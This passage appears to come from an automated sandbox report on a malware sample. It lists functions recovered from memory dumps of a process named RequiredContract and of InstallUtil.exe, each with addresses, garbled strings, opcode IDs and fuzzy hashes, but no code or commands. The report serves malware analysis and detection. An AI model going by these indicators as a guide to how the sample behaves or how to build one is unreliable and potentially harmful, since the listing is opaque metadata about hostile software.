Instruction Fuzzy Hash: 7FE0EDB4E04208EFCB94DFA8D445A9DFBF4EB88314F14C1A9D808D3350D6359A55DF40

Function 077ADED8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2028000294.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7790000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78180930e1a8e4cc9feacce033b71271dbd3e3d0f27646cf94ba66aa54dac63
Instruction ID: 3715fe2040274189cf80617511c1eff676ef5d985cd52f73a2f88c809eabec4b
Opcode Fuzzy Hash: e78180930e1a8e4cc9feacce033b71271dbd3e3d0f27646cf94ba66aa54dac63
Instruction Fuzzy Hash: 41E0EDB4E08208EFCB94DFA8D44069DFBF4EB9C310F10C1A9980993754D7319A55DF40

Function 07796CC2 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2028000294.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7790000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9eda923adce8b3b74baedb58e390b04cea394e03ac12fcbc2c150b7f78cdf22
Instruction ID: 1ea14cb3ae38353e126166a67116b2f7fca56759e5a0128325570810b80e7f0f
Opcode Fuzzy Hash: a9eda923adce8b3b74baedb58e390b04cea394e03ac12fcbc2c150b7f78cdf22
Instruction Fuzzy Hash: B4F03AB4A4011A8FCF54DF18C948A5A73B2FB98300F5040D5D509A7354CBB4ADC1CF80

Function 077ABE88 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2028000294.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7790000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78180930e1a8e4cc9feacce033b71271dbd3e3d0f27646cf94ba66aa54dac63
Instruction ID: e6ba70905c74ac7658f32dea20fc5ec20fc877fe99d1b2a7a37f3e0b145f2e40
Opcode Fuzzy Hash: e78180930e1a8e4cc9feacce033b71271dbd3e3d0f27646cf94ba66aa54dac63
Instruction Fuzzy Hash: 68E0EDB4E08208EFCB84DFA8D44069DFBF4EB98311F10C1A9A80893351D7319A55DF40

Function 077AF6F8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2028000294.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7790000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faef3672946e6a9dc2bfcf2256767ec7e8229e0b5a055e2e351abe66d4709217
Instruction ID: 5a59b4663df03604e7cd7827fae9f179c3f1adf1ab71fa5f25cc0edc273365c7
Opcode Fuzzy Hash: faef3672946e6a9dc2bfcf2256767ec7e8229e0b5a055e2e351abe66d4709217
Instruction Fuzzy Hash: 04E0E5B4E04208EFCB84DFA8E4406ACBBF4EB88304F10C1A9E80893350D631AA06CF40

Function 02FBF1C0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09a38e668471c9c5b2bdfe844c9a260a42fa089ce39adf8b71a79d11c1a28d5b
Instruction ID: 5824115188d60b7d7b1af29f244e8c1356e63ee85722cfe2cc6f8c8f83e36853
Opcode Fuzzy Hash: 09a38e668471c9c5b2bdfe844c9a260a42fa089ce39adf8b71a79d11c1a28d5b
Instruction Fuzzy Hash: 37E08678A09108EBC744DFD5D8409ADFFB8AF45315F10C1A9ED4457351C7319A45DF90

Function 02FBF730 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e015fed0030903219fcbdc4038d581bb64a704b4732c31169aec3d937bee3ac6
Instruction ID: 447eaa8941106b1129d71ee16473c7147649c9026cc94b8c99dcb0ce58f1548a
Opcode Fuzzy Hash: e015fed0030903219fcbdc4038d581bb64a704b4732c31169aec3d937bee3ac6
Instruction Fuzzy Hash: 4FE0E574D08208EBCB45DFA9D8419ACFBB4AB48314F20C1AAA84463751C6319A55DF80

Function 077A8D30 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2028000294.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7790000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 597f7ec8744d86e1c3b7d0b2317a62a7b844412b9e1fe2a2b5b9c535916d7c5e
Instruction ID: 8c122e1484166567f479014c709545587ece558870c1a1846e4005635c72f25e
Opcode Fuzzy Hash: 597f7ec8744d86e1c3b7d0b2317a62a7b844412b9e1fe2a2b5b9c535916d7c5e
Instruction Fuzzy Hash: CEE046B4D08208EFCB44DFE8D4416ACFBB4EB89304F14C1EAD8189B341CA31AA56DF81

Function 077AB858 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2028000294.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7790000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d8769cfc218eb7ab4517b1785d766b2461b3bffac7fb3a50b0474e8f184ea8
Instruction ID: 01f3c566928fe4940d0f189d2cdd1a864b2b6fcc06f0b31f34ce4c44c43f5834
Opcode Fuzzy Hash: 86d8769cfc218eb7ab4517b1785d766b2461b3bffac7fb3a50b0474e8f184ea8
Instruction Fuzzy Hash: E5E012B1941108ABCB80EFF9D91469E77A9DB45301F0059A5D50993160EE719A049B92

Function 077AE450 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2028000294.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7790000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aae28f591de23538dd09bb427ec696751b2ee66909ff1af39dcf28b0b3d981f
Instruction ID: 13231e4bbfd1d786cd85a7db37705b409cec481e7c3cf0c6045fa6502a805690
Opcode Fuzzy Hash: 7aae28f591de23538dd09bb427ec696751b2ee66909ff1af39dcf28b0b3d981f
Instruction Fuzzy Hash: 2AE012B4909208EBCB44DFE4E5415ACBBB9EB85315F10D1A9E80817351CA716E46DF81

Function 02FB0AD0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e7bb338cca10c8f748da380300b1812d0787f9dbf93acef813bc8978d666358
Instruction ID: 81a49cd431082224b4bba51dd03964a842ab6b1527fc109ba585c54fe92ec096
Opcode Fuzzy Hash: 7e7bb338cca10c8f748da380300b1812d0787f9dbf93acef813bc8978d666358
Instruction Fuzzy Hash: 21D01770A0120CEF8B00DFAAE90055DBBB9EB48210B5045AAD80CDB324EA31AE00AF90

Function 077AE8F8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2028000294.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7790000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5fb69f3efb44b353058c05cf427dfd944195e7b089b3140f3be2126fd6db631
Instruction ID: 8485653494f0f26148a96d771a3aef9cda7933eebe5f2eacef7498f3c25cc6f6
Opcode Fuzzy Hash: a5fb69f3efb44b353058c05cf427dfd944195e7b089b3140f3be2126fd6db631
Instruction Fuzzy Hash: 6BC02BF004E30D82E1D016C4B00D77033DCC3C7317F806D10620C02020CEE01458EF12

Function 02FB09B1 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6fcd7cc1cf5d0c494195bdc1108d99b297ca277bc3a0ab07cf57097c1e5ab1f
Instruction ID: bf333f4589789bf0b67de714e624aa489c22445dfad2d334e41a86714b3df5c1
Opcode Fuzzy Hash: a6fcd7cc1cf5d0c494195bdc1108d99b297ca277bc3a0ab07cf57097c1e5ab1f
Instruction Fuzzy Hash: 8AC092BAD9E1C00FC30207600CA12D83FB0DEEB00038E04D2C8D1CB133E22C510F96A1

Function 0779185C Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2028000294.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7790000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31590be36e6fb2f552986a4f00f5ad59b2d80e3fcb0b74150103792ca6e1cf98
Instruction ID: f45f94a01fba040d68170bceb31722500080102e1776ecd7754ca4260a023441
Opcode Fuzzy Hash: 31590be36e6fb2f552986a4f00f5ad59b2d80e3fcb0b74150103792ca6e1cf98
Instruction Fuzzy Hash: C5D0A97429000A8BCB50AF80E058B6B3262FB8A300F1080A4910A87284CB381C88CF21

Function 02FB0850 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70247b54e4a6b592ff115d85e1a02f758cb56790258c147c6a2dc56fb46ee71
Instruction ID: 482ae7e41ef8235f6ec6e1efb71f93df3e92ad2232a3370e7120eb61cc980e01
Opcode Fuzzy Hash: d70247b54e4a6b592ff115d85e1a02f758cb56790258c147c6a2dc56fb46ee71
Instruction Fuzzy Hash: 5B900232054A0D8B455037D57409595B75C96455157844051A50D419165A6564114699

Non-executed Functions

Function 02FB4439 Relevance: 7.5, Strings: 6, Instructions: 11COMMON

Download Yara Rule

Strings

$kq, xrefs: 02FB45FA
TJpq, xrefs: 02FB5B2A
*), xrefs: 02FB5A93
$kq, xrefs: 02FB4610
TJpq, xrefs: 02FB45CE
jjjjjj, xrefs: 02FB4558

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: *)$TJpq$TJpq$jjjjjj$$kq$$kq
API String ID: 0-998880824
Opcode ID: 10fca4b7ae5b314adb20fff07b48f6963b23ad528030b51f7164ab22945295fd
Instruction ID: 2ba83d5a926d7ca25ad500ef4a60ed6f4261677aa56986f88387dc042894cb4f
Opcode Fuzzy Hash: 10fca4b7ae5b314adb20fff07b48f6963b23ad528030b51f7164ab22945295fd
Instruction Fuzzy Hash: 5EC0121150E3D0CEDB030B2A8AF01703E501D53290319D0D7D9C14F447D5184446E327

Function 02FB4489 Relevance: 5.0, Strings: 4, Instructions: 5COMMON

Download Yara Rule

Strings

$kq, xrefs: 02FB45FA
$kq, xrefs: 02FB4610
TJpq, xrefs: 02FB45CE
jjjjjj, xrefs: 02FB4558

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: TJpq$jjjjjj$$kq$$kq
API String ID: 0-2568102283
Opcode ID: f7146fba6ddcdf01cc0842ddc7b8f5fc44f599cea825f99eaa8902cb09b9f3f1
Instruction ID: 070040ca995ffd7382b7f68fc869735e9ad6ce7aac62bc679add8ed7814ab329
Opcode Fuzzy Hash: f7146fba6ddcdf01cc0842ddc7b8f5fc44f599cea825f99eaa8902cb09b9f3f1
Instruction Fuzzy Hash: DFA02230000000CECB0AEE80CCC0A303328FF8230AB38C0AAC00B8F200C330C0CACB22

Analysis Process: InstallUtil.exePID: 8028, Parent PID: 2580COMMON

Executed Functions

Function 01086730 Relevance: 6.7, Strings: 5, Instructions: 442COMMON

Download Yara Rule

Strings

(okq, xrefs: 01086CA5
,oq, xrefs: 010869F2
(okq, xrefs: 01086988
,oq, xrefs: 01086A00
(okq, xrefs: 0108697A

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: (okq$(okq$(okq$,oq$,oq
API String ID: 0-3760967313
Opcode ID: e91900cb8e38541358a47861e8a317ac4eb41530a78cf6b931c29b2cf81331cb
Instruction ID: b51c7792cfd9a692a36e8a15d33a71e6bedc5c465403f71d5bdf31f93a082c3b
Opcode Fuzzy Hash: e91900cb8e38541358a47861e8a317ac4eb41530a78cf6b931c29b2cf81331cb
Instruction Fuzzy Hash: 0E02A170A04219DFCB55DF69C984AAEBBF6FF48304F168069E485AB261DB32DD41CF50

Function 0108B328 Relevance: 6.6, Strings: 5, Instructions: 353COMMON

Download Yara Rule

Strings

LjNp, xrefs: 0108B6CF
0oNp, xrefs: 0108B562
PHkq, xrefs: 0108B747
PHkq, xrefs: 0108B758
LjNp, xrefs: 0108B6E5

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: b56eb62e60fe47c4521d17ee10485e82595215b094991a8d5786af9ffb18526d
Instruction ID: 29e3dfa3b0c6d5bfabdebb850b8e5ee42cb245104b8ad93f97c8c1e6d598ddd8
Opcode Fuzzy Hash: b56eb62e60fe47c4521d17ee10485e82595215b094991a8d5786af9ffb18526d
Instruction Fuzzy Hash: 1CE10874E04618CFDB14DFA9C984A9DBBF1FF49310F1590A9E899AB362DB30A841CF50

Function 0108C751 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

LjNp, xrefs: 0108C92F
PHkq, xrefs: 0108C9B8
LjNp, xrefs: 0108C945
0oNp, xrefs: 0108C7C2
PHkq, xrefs: 0108C9A7

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 60b4eb90601fffc36b7e9e8b112ee30f4b7bd632fda31bf4c63fc0bd5db6b328
Instruction ID: fb6a5ed68bfdc2febb4c3d3d4830b83a4d03e184fa6f0cd0b057b9423e703078
Opcode Fuzzy Hash: 60b4eb90601fffc36b7e9e8b112ee30f4b7bd632fda31bf4c63fc0bd5db6b328
Instruction Fuzzy Hash: D181D574E05218CFEB54DFAAD984A9DBBF2BF89310F14C069E489AB365DB309941CF10

Function 0108C470 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

0oNp, xrefs: 0108C4E2
PHkq, xrefs: 0108C6C7
LjNp, xrefs: 0108C64F
LjNp, xrefs: 0108C665
PHkq, xrefs: 0108C6D8

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 3ea431e0c7e903acd7f0bf8f15c48ff0e89593fa5143d9ea7a63635ecb10640e
Instruction ID: a9cb150a07c7392f87c3909b175a5342e5a5670ec2e45460f0eef96a7f485d3e
Opcode Fuzzy Hash: 3ea431e0c7e903acd7f0bf8f15c48ff0e89593fa5143d9ea7a63635ecb10640e
Instruction Fuzzy Hash: 9A81A674E04218DFEB54DFAAD984A9DBBF2BF89300F14D069E449AB365DB346941CF20

Function 0108C190 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

LjNp, xrefs: 0108C385
PHkq, xrefs: 0108C3F8
PHkq, xrefs: 0108C3E7
LjNp, xrefs: 0108C36F
0oNp, xrefs: 0108C202

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: f0d02b5d9b178b2daaa4f6713b13871e0b1c236da34d3616d24c193eba9e42ba
Instruction ID: 53d8e6c913343f9dc6a3f5d1a8f109b85a73e0a776f8727148ac9d6aeaa8a4df
Opcode Fuzzy Hash: f0d02b5d9b178b2daaa4f6713b13871e0b1c236da34d3616d24c193eba9e42ba
Instruction Fuzzy Hash: 3C81C574E04218DFEB54DFAAD984A9DBBF2BF89300F14C069E449AB365DB309946CF50

Function 0108BBD2 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

LjNp, xrefs: 0108BDAF
PHkq, xrefs: 0108BE27
PHkq, xrefs: 0108BE38
0oNp, xrefs: 0108BC42
LjNp, xrefs: 0108BDC5

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 98ea2701236a8eb94d259a3e258849a13c86e14293abea1e27d0913891a29afc
Instruction ID: 4ca616ec818752800dd96bcb27a0ef7cf62a022a37c5a4984a614d435caf7812
Opcode Fuzzy Hash: 98ea2701236a8eb94d259a3e258849a13c86e14293abea1e27d0913891a29afc
Instruction Fuzzy Hash: 8D81C774E04208DFDB54EFAAD884A9DBBF2BF89300F14D069E549AB365DB349945CF10

Function 0108CA31 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

0oNp, xrefs: 0108CAA2
LjNp, xrefs: 0108CC0F
PHkq, xrefs: 0108CC87
LjNp, xrefs: 0108CC25
PHkq, xrefs: 0108CC98

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: d7b36af9df12cd5f8d636ee2d783a3b25287db662db3475aa0183298142e1161
Instruction ID: f21cdb2e6840096226f46fe45cb0bcea7cfae2815aa48f4b2cf5adf8eec159b9
Opcode Fuzzy Hash: d7b36af9df12cd5f8d636ee2d783a3b25287db662db3475aa0183298142e1161
Instruction Fuzzy Hash: 3381B574E04618CFEB54DFAAD984A9DBBF2BF88300F14C069E849AB365DB349941CF50

Function 01084AD9 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

PHkq, xrefs: 01084D30
PHkq, xrefs: 01084D41
LjNp, xrefs: 01084CB8
0oNp, xrefs: 01084B4A
LjNp, xrefs: 01084CCE

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
API String ID: 0-1749821215
Opcode ID: 14632923b7e199f8ca87ff921f6a4075b062dbbb49bf369f97e6bec02447f766
Instruction ID: d61af0a138dcb2ed3187b91fe3bce7f344116bcec933609920f6c66ae7259635
Opcode Fuzzy Hash: 14632923b7e199f8ca87ff921f6a4075b062dbbb49bf369f97e6bec02447f766
Instruction Fuzzy Hash: 3B81B074E04218DFDB54DFAAD984B9DBBF2BF88300F148069E859AB365DB34A945CF10

Function 0108B4F2 Relevance: 3.9, Strings: 3, Instructions: 155COMMON

Download Yara Rule

Strings

0oNp, xrefs: 0108B562
PHkq, xrefs: 0108B747
PHkq, xrefs: 0108B758

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oNp$PHkq$PHkq
API String ID: 0-3540209698
Opcode ID: 1ff09f73c8150128f491dca518b103481dddac1605893fce6f9538dc4b97b20c
Instruction ID: bf77468ac3b8cb3b3eb858c5ee1f8e29f31af6a0160ebf3b443f8adb08f9e5d4
Opcode Fuzzy Hash: 1ff09f73c8150128f491dca518b103481dddac1605893fce6f9538dc4b97b20c
Instruction Fuzzy Hash: A961D374E056088FDB54DFAAD984A9EFBF2BF89300F14D069E449AB365DB345942CF10

Function 01089858 Relevance: 3.4, Strings: 2, Instructions: 856COMMON

Download Yara Rule

Strings

(okq, xrefs: 01089C78
4'kq, xrefs: 0108A273

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: (okq$4'kq
API String ID: 0-1210385896
Opcode ID: 652d48a68d74563826b24af4a9442b33a1c8c5643a419029e4ee269e00ff6074
Instruction ID: 4688e315fec2b62f27acd672b7071d6a92bca12aebf7eb1f2ddd8fedc598fd8b
Opcode Fuzzy Hash: 652d48a68d74563826b24af4a9442b33a1c8c5643a419029e4ee269e00ff6074
Instruction Fuzzy Hash: 90729271A04209CFCF15EF68C984AAEBBF2FF88314F158556E8859B7A2D730E951CB50

Function 01086108 Relevance: 3.0, Strings: 2, Instructions: 511COMMON

Download Yara Rule

Strings

(okq, xrefs: 01086642
Hoq, xrefs: 0108650E

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID: (okq$Hoq
API String ID: 0-4134915641
Opcode ID: 58285fd0948f0e048343444eea0f2379a8b511a1dedc66b6b4ca5fa90c2565f0
Instruction ID: 5b65f5ff1c43408e392915cdcac4d6da2a6bad583d1a47611464cfa37f14c2bf
Opcode Fuzzy Hash: 58285fd0948f0e048343444eea0f2379a8b511a1dedc66b6b4ca5fa90c2565f0
Instruction Fuzzy Hash: 54128D70A002198FDB54EF69C954AAEBBF6FF88300F118569E585AB391DF31DD42CB90

Function 06508C51 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

PHkq, xrefs: 06508E9A
PHkq, xrefs: 06508EAB

Memory Dump Source

Source File: 00000007.00000002.4224483731.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6500000_InstallUtil.jbxd

Similarity

API ID:
String ID: PHkq$PHkq
API String ID: 0-119726883
Opcode ID: 3e7121ee616759c57c575bb82fa38bd01ab784608d59df331bc68497b8410f5e
Instruction ID: aaf8fcdd3d6654c27c6973c27bd066d1c7b547a790d542d26a93d10fab12d604
Opcode Fuzzy Hash: 3e7121ee616759c57c575bb82fa38bd01ab784608d59df331bc68497b8410f5e
Instruction Fuzzy Hash: 2781B370E01218CFEF58DFA9D994B9DBBB2BF89300F20816AD419AB394DB359945CF50

Function 065011A0 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4224483731.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6500000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a6033ab7019acaf3c687739b2689bb3ed4584866da074600246769ed01af4e
Instruction ID: e2e1f6c947ff360e89c76fb3e463c4d31172c1ead78dce627c4f3b1b0f9dc1c6
Opcode Fuzzy Hash: 99a6033ab7019acaf3c687739b2689bb3ed4584866da074600246769ed01af4e
Instruction Fuzzy Hash: 73826F74E012288FDB64DF69C994BDDBBB2BF89300F1481EA940DA7265DB319E85CF41

Function 0108F007 Relevance: .7, Instructions: 718COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4214376701.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f75a5ba239b8b128d919b4d30ec1f242acd5f23a635b83737f04a800f8527ad
Instruction ID: 19945c14ad3de896342e4c0234894bf84de9dd0a4a8fc4e7901fb169ca59349a
Opcode Fuzzy Hash: 5f75a5ba239b8b128d919b4d30ec1f242acd5f23a635b83737f04a800f8527ad
Instruction Fuzzy Hash: 0172CF74E052298FDB64EF69C980BDDBBB2BB49300F1491E9D489A7355EB309E81CF50

Function 06508608 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4224483731.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6500000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a79e1b971dc126c6cba2daf9fa658d56be6205cd0b2764cb5c4b21fb4401ea
Instruction ID: 8e6d944100e0f8a42ba3c337cad1031e1638aaeb21a904f7b878f2f78fd4e0fd
Opcode Fuzzy Hash: f4a79e1b971dc126c6cba2daf9fa658d56be6205cd0b2764cb5c4b21fb4401ea
Instruction Fuzzy Hash: 89E1E174E01218CFEB64DFA5C944B9DBBB2BF89304F2081A9D409BB394DB759A85CF50

Function 0650D670 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4224483731.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6500000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63685b61feac32f8b6b950ec460d782d7a8ec44aec0eea0d9ddcdfda499e73d
Instruction ID: 19a4404f1367968dce43a84fc807e95c8b8579c99d5af76923c41f12305a7b18
Opcode Fuzzy Hash: d63685b61feac32f8b6b950ec460d782d7a8ec44aec0eea0d9ddcdfda499e73d
Instruction Fuzzy Hash: 0AA1A275E012188FEB58CF6AD944B9DFBF2BF89300F14D1AAD409A7255DB309A85CF50

Function 0650B6E8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4224483731.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6500000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbdb98d731918e569739ab72b2a29944c45a3d12d17bc91f37f1ff6172c380e5
Instruction ID: 4fa3da479af770d27138cba9cb57ff02d7f8b081ad1247f598a381f7e2df1a05
Opcode Fuzzy Hash: dbdb98d731918e569739ab72b2a29944c45a3d12d17bc91f37f1ff6172c380e5
Instruction Fuzzy Hash: FAA1A371E012188FEB58CF6AC984B9DBBF2BF89300F14D4AAD409B7251DB319A85CF51

Function 0650C388 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

